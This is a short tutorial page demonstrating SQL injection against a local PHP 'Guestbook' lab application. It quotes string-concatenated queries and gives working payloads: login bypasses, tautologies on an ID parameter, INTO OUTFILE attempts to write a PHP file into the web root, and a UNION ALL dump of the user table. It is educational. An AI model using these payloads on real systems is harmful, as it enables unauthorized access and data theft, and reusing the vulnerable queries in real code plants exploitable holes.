Examples for SQL Injection

For this example, we use the "Guestbook" application. guestbook (only on my local computer).
Those examples work better if the magic_quote_gpc is set to false in the php.ini config file. Otherwize, you get backslash before the quotes and double quotes.

Login

The login function in the source code contains the following code:
$query = "select * from user where username='$user' and password = '$pwd'";
$result = mysql_query($query , $conn);

In order to log in the system without password, type:

username = "' OR 'a'='a
password = 

In order to log in the system with username "benoist":

username = emmanuel
password = ' OR 'b' BETWEEN 'a' AND 'c

We can achieve the same goal using comments, we comment out the rest of the line.

username = emmanuel'#
password = Hello World (it does not matter any how)

Selection of a page

The selection of a page is done using the following code in the php program:

    
    $query = "select username, guestbook.* from  user, guestbook where guestbookID=$number AND guestbook.author=userID";
    $result = mysql_query($query , $conn);

In order to manipulate the parameter $number, just visit a message and change its ID in the query string.

Access to any information

id= 11 or 1=1

Transfer information into a file:

id= 11 or 1=1 INTO  OUTFILE '/tmp/test.txt'#
But this sentence is not valid for a URL, so we need to URL encode it:
11+or+1%3D1+INTO++OUTFILE+%27%2Ftmp%2Ftest.txt%27%23
The file created "/tmp/test.txt" has the same owner as the one executing MySQL.

We want to write a php file in our htdocs.

id= 11 or 1=1 INTO  OUTFILE '/Applications/XAMPP/htdocs/test.php'#
Which is url-encoded in:
11+or+1%3D1+INTO++OUTFILE+%27%2FApplications%2FXAMPP%2Fhtdocs%2Ftest.php%27%23
Unfortunately (or fortunately) one can not write into the directory "htdocs" because the user "nobody" does not have enought rights.

Union All

Use UNION ALL to view the content of another table
In the search field:

hello%' union all select * from user, guestbook where user.userID=guestbook.author  group by userID#